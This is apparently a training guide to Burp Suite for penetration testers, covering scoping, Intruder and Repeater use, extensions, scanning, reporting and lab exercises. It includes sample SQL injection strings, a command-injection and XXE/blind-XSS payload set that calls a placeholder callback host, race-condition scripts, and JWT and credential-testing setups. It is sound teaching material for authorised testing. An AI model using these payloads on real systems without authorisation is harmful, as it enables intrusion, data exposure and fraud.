Burp Suite Professional Workflow for Security Engineers

Transform from a casual Burp user to a professional security tester. This guide covers advanced workflows, essential extensions, and the methodology that separates senior pentesters from beginners.

Quick Reference

Feature	Shortcut	Purpose
Send to Repeater	Ctrl+R	Manual request manipulation
Send to Intruder	Ctrl+I	Automated attacks
Send to Comparer	Ctrl+C	Diff responses
Forward intercept	Ctrl+F	Pass request through
Drop request	Ctrl+D	Block request
Toggle intercept	Ctrl+T	Enable/disable interception
Search	Ctrl+Shift+F	Find across all traffic
Go to item	Ctrl+G	Navigate to request #

Professional Project Setup

Creating a New Project

1. File → New Project → Disk-based Project
2. Name: CLIENT_AppName_YYYY-MM-DD
3. Select configuration: Load from template or import

Example: Acme_CustomerPortal_2024-01-15

Project Configuration Best Practices

Scope Definition:

Target → Scope → Add
- Include: *.target.com
- Include: api.target.com
- Exclude: *.google-analytics.com
- Exclude: *.doubleclick.net
- Exclude: logout endpoints (prevent accidental logout)

Session Handling Rules:

Project options → Sessions → Session Handling Rules

Rule 1: Check session validity
- Scope: Target scope
- Check: GET /api/user/profile
- If invalid: Run macro to re-authenticate

Rule 2: Add custom header
- Scope: All requests
- Add header: X-Custom-Correlation-ID: {UUID}

Performance Tuning

User options → Connections
- Maximum concurrent requests: 10-20
- Connection timeout: 30 seconds
- Follow redirects: In-scope only

User options → Performance
- Reduce memory: Discard out-of-scope items
- Save project periodically: Every 30 minutes

Systematic Reconnaissance Workflow

Step 1: Passive Crawl

1. Configure browser proxy to Burp
2. Manually browse application for 15-30 minutes
3. Click every link, submit every form
4. Log in with test account, explore authenticated areas
5. Check Sitemap for discovered content

Step 2: Active Discovery

Target → Sitemap → Right-click → Engagement tools → Discover content

Settings:
- Start directory: /
- Discovery depth: 3-4
- File extensions: php, asp, aspx, jsp, json, xml
- Custom wordlist: SecLists/Discovery/Web-Content/

Step 3: Parameter Analysis

Target → Sitemap → Right-click → Actively scan this host

Or use Param Miner extension:
Extensions → Param Miner → Guess headers
Extensions → Param Miner → Guess params

Common hidden parameters:
- debug, test, admin, internal
- id, uid, user_id, account
- callback, redirect, return_url
- format, output, response_type

Intruder Attack Types

Attack Type Selection

Type	Payload Positions	Use Case
Sniper	Single, rotated	Fuzzing one parameter
Battering ram	All same	Same payload everywhere
Pitchfork	Parallel lists	Username:Password pairs
Cluster bomb	Cartesian product	All combinations

Sniper Attack Example

Scenario: IDOR testing on user ID

Request:
GET /api/users/§12345§/profile HTTP/1.1
Host: api.target.com
Authorization: Bearer eyJ...

Payload: Numbers 1-10000
Grep - Extract: "email": "([^"]+)"

Pitchfork Attack Example

Scenario: Credential testing

Request:
POST /api/login HTTP/1.1
Content-Type: application/json

{"username":"§user1§","password":"§pass1§"}

Payload 1: users.txt
Payload 2: passwords.txt (parallel to users)

Grep - Match: "success": true

Cluster Bomb Example

Scenario: Testing multiple parameters

Request:
GET /api/data?user=§admin§&role=§user§ HTTP/1.1

Payload 1: admin, guest, user
Payload 2: user, admin, superuser

Total requests: 3 × 3 = 9 combinations

Repeater Mastery

Efficient Testing Workflow

1. Capture interesting request in Proxy
2. Send to Repeater (Ctrl+R)
3. Create tab groups by test type:
   - Group 1: Authentication tests
   - Group 2: Authorization tests
   - Group 3: Injection tests

Right-click tab → Rename: "SQLi - UserID param"

Response Analysis

Inspector panel (right side):
- Request: View/edit headers, cookies, parameters
- Response: Headers, attributes, timing

Response rendering:
- Pretty: Formatted JSON/XML
- Raw: Original response
- Hex: Binary analysis
- Render: Visual preview

Request Comparison

1. Send baseline request
2. Modify and send variant
3. Select both → Right-click → Send to Comparer

Comparer shows:
- Words: Textual differences
- Bytes: Binary differences

Use for:
- Detecting blind injection (response length changes)
- Comparing error vs success responses
- Finding subtle differences in authorization

Essential Extensions

Must-Have Extensions

Extension	Purpose	Installation
Autorize	Authorization testing	BApp Store
Logger++	Enhanced logging	BApp Store
Param Miner	Hidden parameter discovery	BApp Store
Hackvertor	Encoding/payload generation	BApp Store
JWT Editor	JWT manipulation	BApp Store
Active Scan++	Enhanced scanning	BApp Store
Turbo Intruder	High-speed attacks	BApp Store
CO2	SQLi helper	BApp Store

Autorize Setup (Authorization Testing)

1. Extensions → Autorize → Enable

Configuration:
- Low-privilege session: Cookie: session=low_priv_user_token
- Or Header: Authorization: Bearer low_priv_token

Workflow:
1. Browse as admin/high-privilege user
2. Autorize replays with low-privilege token
3. Check results:
   - Green: Properly restricted
   - Red: Authorization bypass!
   - Yellow: Different response (investigate)

JWT Editor Usage

1. Capture JWT-authenticated request
2. JSON Web Tokens tab auto-appears

Attacks:
- Algorithm: None → Test none algorithm bypass
- Algorithm: RS256→HS256 → Test confusion attack
- Signing Key: Brute force weak secrets

Key database:
- Add known weak secrets (jwt-secrets.txt)
- Add discovered keys

Turbo Intruder (Race Conditions)

# race-single-packet-attack.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # Queue 20 requests
    for i in range(20):
        engine.queue(target.req, gate='race')

    # Release all at once
    engine.openGate('race')

def handleResponse(req, interesting):
    table.add(req)

Use cases:
- Race conditions (coupon redemption, votes)
- Rate limit bypass
- Time-based attacks
- High-volume fuzzing

Scanner Configuration

Scan Strategies

Audit configuration:
1. Dashboard → New scan → Scan configuration

Built-in configs:
- Audit checks - all: Comprehensive (slow)
- Audit checks - fast: Quick assessment
- Audit checks - light: Minimal noise

Custom config for production:
- Disable: Blind SQL injection (slow)
- Enable: XSS, SQLi, path traversal
- Limit: 2 concurrent requests

Handling Authentication

Scan configuration → Application login
Option 1: Record login macro
Option 2: Use existing authenticated session

Session handling for scans:
1. Project options → Sessions → Macros
2. Record: Login sequence
3. Create session handling rule:
   - If response contains "please log in"
   - Run macro: Login

Test before scanning:
- Tools → Session handling tracer

Reducing False Positives

Scan configuration → Issues reported
- Confidence: Certain + Firm (exclude Tentative)
- Severity: High + Medium (exclude Low + Info)

Post-scan:
- Right-click issue → False positive
- Create match rule to auto-mark similar findings

Professional Testing Methodology

Phase 1: Authentication Testing

Checklist:
□ Default credentials
□ Password policy bypass
□ Account enumeration (timing, error messages)
□ Brute force protection
□ Session token analysis
  - Sequencer: Capture 10,000 tokens
  - Analyze randomness
□ Session fixation
□ Logout functionality
□ Remember me functionality
□ Password reset flow

Sequencer Analysis:

1. Capture token-setting response
2. Right-click → Send to Sequencer
3. Select token parameter
4. Start live capture (10,000+ samples)
5. Analyze → Check entropy
   - Good: 128+ bits effective entropy
   - Bad: < 64 bits or patterns detected

Phase 2: Authorization Testing

Setup Autorize with:
- Admin session (primary traffic)
- Regular user session (auto-replay)
- Unauthenticated (optional third check)

Test matrix:
| Resource | Admin | User | Unauth |
|----------|-------|------|--------|
| GET /admin/users | ✓ | ✗ | ✗ |
| POST /api/delete/1 | ✓ | ✗ | ✗ |
| GET /api/user/1 | ✓ | Own only | ✗ |

For each red finding:
1. Verify manually in Repeater
2. Document impact
3. Note remediation

Phase 3: Injection Testing

High-value injection points:
1. Search parameters
2. ID parameters (IDOR + SQLi)
3. File paths
4. API fields in JSON
5. Headers (Host, X-Forwarded-For)

SQLi testing with Scanner:
Target → Sitemap → Right-click param → Scan selected insertion point

Manual SQLi (Repeater):
- ' → Error based
- ' OR '1'='1 → Boolean
- ' AND SLEEP(5)-- → Time based
- ' UNION SELECT NULL-- → Union based

Phase 4: Business Logic Testing

Cannot be automated - requires manual testing:

1. Workflow bypass
   - Skip steps in multi-step process
   - Complete step 1, then step 3

2. Parameter manipulation
   - Change prices, quantities
   - Modify user roles
   - Alter timestamps

3. Race conditions
   - Use Turbo Intruder
   - Target: Discounts, votes, money transfers

4. Rate limiting
   - Intruder: Test volume limits
   - X-Forwarded-For rotation

Reporting Workflow

Organizing Findings

Target → Site map → Issues

For each finding:
1. Right-click → Add to issue
2. Edit issue:
   - Clear title
   - Evidence (request/response)
   - Impact description
   - Remediation

Custom severity:
- Right-click issue → Set severity

Generating Reports

Target → Sitemap → Right-click → Report selected issues

Report settings:
- Format: HTML (for clients), XML (for tracking)
- Include: Full requests/responses
- Exclude: Scanner-only items if not verified

Report sections:
1. Executive Summary (auto-generated)
2. Technical Details
3. Evidence
4. Remediation

Evidence Collection

For each finding, capture:
1. Screenshot of vulnerable request
2. Request showing attack payload
3. Response proving vulnerability
4. Impact demonstration

Export: Right-click request → Copy as curl command
This allows:
- Reproducibility
- Verification by developers
- Integration into tickets

Interview Deep Dive

Q: Walk me through your Burp Suite testing methodology.

A: My methodology follows a systematic approach:

Project Setup: Create disk-based project with naming convention (client_app_date). Configure scope to include target domains and exclude tracking/third-party services.
Passive Reconnaissance: Manually browse the application to populate the sitemap. Use Param Miner to discover hidden parameters.
Authentication Testing: Use Sequencer to analyze token entropy, test for account enumeration, session management flaws.
Authorization Testing: Configure Autorize with multiple privilege levels, replay all requests to detect authorization bypasses.
Injection Testing: Use Scanner on high-value parameters, verify findings manually in Repeater, test for SQLi, XSS, path traversal.
Business Logic: Manual testing for workflow bypasses, race conditions with Turbo Intruder, price manipulation.
Reporting: Document findings with evidence, generate report with remediation guidance.

Q: How do you handle false positives from the scanner?

A: I address false positives through:

Pre-scan filtering: Configure scan to report only Certain/Firm confidence findings initially
Manual verification: Every scanner finding gets verified in Repeater before reporting
Context analysis: Understand the technology stack - some findings are FPs for certain frameworks
Pattern recognition: Create match rules for known false positive patterns
Severity adjustment: Downgrade or remove findings that don’t represent real risk
Client communication: Explain why certain findings are informational vs actionable

Q: How would you test for authorization vulnerabilities at scale?

A: I use a multi-layered approach:

Autorize extension: Configure with low-privilege session, browse as admin, auto-test every request
Endpoint mapping: Build matrix of all endpoints with required roles
IDOR automation: Use Intruder with ID lists across all object-referencing endpoints
Function-level testing: Attempt admin functions (user creation, deletion) with regular user tokens
Horizontal testing: Access other users’ resources by changing identifiers
JWT manipulation: Test for algorithm confusion, weak secrets, claim modification

Q: Explain how you’d test for race conditions using Burp.

A: Race condition testing requires precise timing:

Identify candidates: Discount codes, votes, money transfers, unique resource creation
Turbo Intruder setup: Use race-single-packet-attack for HTTP/1.1 or HTTP/2 single-packet attack
Gate mechanism: Queue 20+ identical requests, release simultaneously
Response analysis: Check if multiple requests succeeded (e.g., multiple discount applications)
Timing variation: Test with slight delays to find vulnerable windows
HTTP/2 advantage: Use single-packet attack for true simultaneous delivery

Q: How do you handle applications with anti-CSRF tokens?

A: Several approaches depending on the scenario:

Macro-based extraction:
- Record macro that fetches page with token
- Configure session handling to extract token
- Auto-insert into subsequent requests
Extension handling:
- Use CSRF Token Tracker extension
- Automatically updates tokens per request
Intruder configuration:
- Use Recursive grep to extract token from response
- Feed into next request payload
Manual testing:
- Fetch token in browser, manually update in Repeater
- For quick one-off tests

Hands-on Lab Scenarios

Lab 1: Authorization Testing

Objective: Find all IDOR vulnerabilities using Autorize.

Setup:
1. Login as admin@test.com (high privilege)
2. Configure Autorize with user@test.com session cookie
3. Enable Autorize

Testing:
4. Browse admin panel as admin
5. Check Autorize results - red items = bypass
6. For each red item:
   - Send to Repeater
   - Verify access with low-privilege token
   - Document endpoint, impact, remediation

Expected findings:
- GET /api/users (lists all users as regular user)
- DELETE /api/user/5 (can delete other users)
- PUT /api/user/5/role (can modify roles)

Lab 2: Token Entropy Analysis

Objective: Evaluate session token randomness.

1. Find token-generating response (login, set-cookie)
2. Right-click → Send to Sequencer
3. Start live capture
4. Collect 10,000+ tokens
5. Analyze:
   - Character-level analysis: Distribution
   - Bit-level analysis: Entropy
   - Overall result: Excellent/Reasonable/Poor

Red flags:
- Sequential patterns
- Timestamp-based generation
- Less than 64 bits entropy
- Predictable components

Lab 3: Race Condition Exploitation

Objective: Apply discount code multiple times.

# Turbo Intruder script
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    for i in range(50):
        engine.queue(target.req, gate='race')

    engine.openGate('race')

def handleResponse(req, interesting):
    if 'discount applied' in req.response:
        table.add(req)

Expected result:
- Normal behavior: 1 discount application
- Vulnerable: Multiple discounts applied
- Document: Time window, success rate

Advanced Techniques

Match and Replace Rules

Proxy → Options → Match and Replace

Use cases:
1. Add custom header to all requests:
   Match: ^
   Replace: X-Debug: true\r\n
   Type: Request header

2. Remove security headers for testing:
   Match: X-Frame-Options:.*
   Replace: (empty)
   Type: Response header

3. Modify parameters on the fly:
   Match: user_role=regular
   Replace: user_role=admin
   Type: Request body

Bambdas (Custom Filters)

// Filter for requests with potential SQLi params
return requestResponse.request().contains("id=")
    || requestResponse.request().contains("user=")
    || requestResponse.request().contains("search=");

// Filter for large responses
return requestResponse.response().body().length() > 10000;

// Filter for specific status codes
return requestResponse.response().statusCode() == 500;

Collaborator Integration

Testing blind vulnerabilities:
1. Burp → Collaborator → Copy to clipboard
2. Inject payload:
   ping $(whoami).your-collaborator-id.oastify.com
3. Check Collaborator for DNS/HTTP callbacks

Collaborator payloads:
- SSRF: http://collaborator-id.oastify.com
- XXE: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator-id.oastify.com">]>
- Blind XSS: <script src="//collaborator-id.oastify.com"></script>

Configuration Templates

Bug Bounty Configuration

Scope:
- *.target.com (include subdomains)
- Exclude: /logout, /delete, /payment

Scanner:
- Low impact only
- Concurrent requests: 2
- Throttle: 200ms between requests

Extensions:
- Autorize, Logger++, Param Miner, Hackvertor

Pentest Configuration

Scope:
- Specific application URLs
- Include API endpoints
- Exclude third-party

Scanner:
- Full scan
- Concurrent: 5-10
- No throttling (unless requested)

Extensions:
- Full toolkit
- Active Scan++, Turbo Intruder

Troubleshooting

Common Issues

Issue	Solution
Proxy not intercepting	Check browser proxy settings, Burp listening port
HTTPS errors	Install Burp CA certificate in browser
Missing requests	Check scope settings, proxy is intercepting
Slow performance	Reduce project size, disable unused extensions
Lost session	Check session handling rules, re-authenticate
Scanner missing vulns	Verify scope includes insertion points

Performance Optimization

1. Reduce memory usage:
   Project → Options → Misc → Discard out-of-scope

2. Clear logs:
   Proxy → HTTP history → Right-click → Clear history

3. Disable unused extensions

4. Save project regularly (prevents corruption)

What’s Next?

Web Application Pentesting Guide - Comprehensive testing methodology
API Security Testing - API-specific testing with Burp
DOM XSS Deep Dive - Advanced XSS testing techniques

Key Takeaways

Project organization matters - Proper naming, scope, and session handling saves hours
Extensions are essential - Autorize, Logger++, and Param Miner should always be running
Verify scanner findings - Never report unverified automated findings
Business logic requires manual testing - Scanners can’t find design flaws
Document everything - Good evidence makes reports defensible
Master Repeater - Most critical findings come from manual manipulation